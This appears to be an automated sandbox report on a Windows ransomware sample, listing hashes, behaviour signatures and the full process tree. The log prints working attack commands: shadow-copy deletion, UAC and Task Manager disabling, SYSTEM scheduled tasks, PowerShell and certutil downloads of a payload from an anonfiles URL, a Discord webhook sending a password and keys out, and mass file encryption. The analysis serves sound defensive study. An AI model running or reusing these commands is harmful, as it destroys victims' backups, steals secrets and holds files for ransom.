Analysis
-
max time kernel
125s -
max time network
94s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-02-2021 08:52
General
-
Target
RenderGraphics.bin.exe
-
Size
1006KB
-
MD5
46a1769d81d7dcda455f0f05b9b29648
-
SHA1
4d56dffea9d04ee8ed174f1b3328675daf4be7b1
-
SHA256
9e4f1334d3712298cb3d18e38cd954c893c890d09ad457683c8d7956a9bdb635
-
SHA512
8c8ed91b996f84807be1337fe770db4eadd0a7da00fe0545f6de86bd577054dc9a3df22cd81e25ffb4f1ea3e7642409ff9e01a57c582abb099719b069c9fc193
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe
Signatures
-
UAC bypass 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 2 IoCs
-
Disables Task Manager via registry modification
-
Executes dropped EXE 64 IoCs
-
Modifies extensions of user files 24 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops startup file 2 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 4 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies registry class 2 IoCs
-
Opens file in notepad (likely ransom note) 4 IoCs
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious use of AdjustPrivilegeToken 62 IoCs
-
Suspicious use of FindShellTrayWindow 8 IoCs
-
Suspicious use of SendNotifyMessage 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\50C1.bat C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe"2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:643⤵
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f3⤵
- Modifies Control Panel
-
C:\Windows\system32\attrib.exeattrib +r +s +h C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe3⤵
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +r +s +h "C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":writing_hand: LEAKGAP: Crypting Files..." -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start -verb runas cmd.exe -ArgumentList "/c kill.bat" -filepath "C:\Users\Admin\AppData\Local\Temp" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im opera.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im firefox.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im iexplore.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\RenderGraphics.bin.exe" /RU "SYSTEM" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe -OutFile C:\Users\Admin\AppData\Local\Temp\final.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe C:\Users\Admin\AppData\Local\Temp\final.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\50AF.tmp\50B0.tmp\extd.exe "/download" "https://cdn-35.anonfiles.com/9821W1G5p3/8a0b1f8a-1613613819/gameover.exe" "C:\Users\Admin\AppData\Local\Temp\final.exe" "" "" "" "" "" ""3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\schtasks.exeschtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 53⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\DiscordSendWebhook" -m ":satellite: LEAKGAP: Info from Admin, Password: kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh, FakeAccount: BUqT8JXD7pI90Dz17V9SNhEUk8qVQ8khPH2rP, PersonalKey:||RSLgNRKl0oUE979LWZaRUh4MpMfNOD6SN4l0sOa||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start-process -verb runas -FilePath "C:\Users\Admin\AppData\Local\Temp\final.exe" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +r +s +h C:\Users\Admin\AppData\Local\Temp /s /D3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRequest.midi.lck" "ReadRequest.midi"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ReadRequest.midi.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchStop.ps1.lck" "WatchStop.ps1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "WatchStop.ps1.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertFind.mpg.lck" "ConvertFind.mpg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConvertFind.mpg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairBackup.dib.lck" "RepairBackup.dib"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RepairBackup.dib.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompressSuspend.MOD.lck" "CompressSuspend.MOD"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "CompressSuspend.MOD.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideRepair.vsdx.lck" "HideRepair.vsdx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "HideRepair.vsdx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UndoPush.cab.lck" "UndoPush.cab"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UndoPush.cab.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountLock.mpp.lck" "MountLock.mpp"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "MountLock.mpp.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceiveConnect.M2T.lck" "ReceiveConnect.M2T"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ReceiveConnect.M2T.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockEnter.xps.lck" "BlockEnter.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "BlockEnter.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountMeasure.css.lck" "DismountMeasure.css"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "DismountMeasure.css.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRedo.vbe.lck" "ReadRedo.vbe"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ReadRedo.vbe.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "EditDebug.fon.lck" "EditDebug.fon"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "EditDebug.fon.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearExit.cfg.lck" "ClearExit.cfg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ClearExit.cfg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StopSelect.dotx.lck" "StopSelect.dotx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "StopSelect.dotx.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "StartInitialize.png.lck" "StartInitialize.png"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "StartInitialize.png.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ShowSearch.gif.lck" "ShowSearch.gif"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ShowSearch.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectMove.emf.lck" "ConnectMove.emf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConnectMove.emf.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupExit.gif.lck" "BackupExit.gif"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "BackupExit.gif.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallLock.xps.lck" "InstallLock.xps"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "InstallLock.xps.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestartSearch.bmp.lck" "RestartSearch.bmp"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "RestartSearch.bmp.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnblockSearch.svg.lck" "UnblockSearch.svg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "UnblockSearch.svg.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConfirmAdd.jpeg.lck" "ConfirmAdd.jpeg"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ConfirmAdd.jpeg.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c Invoke-WebRequest -Uri -OutFile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\certutil.execertutil -urlcache -split -f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\Desktop\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\Desktop\p2d.bat4⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt5⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.ini.lck" "ntuser.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "deployment.properties.lck" "deployment.properties"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "deployment.properties.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG1.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.lck"3⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "NTUSER.DAT.lck" "NTUSER.DAT"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "NTUSER.DAT.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /aD /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Admin.contact.lck" "Admin.contact"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Admin.contact.lck"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Pay2Decrypt54.txt.lck" "Pay2Decrypt54.txt"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "Pay2Decrypt54.txt.lck"3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "These.docx.lck" "These.docx"3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
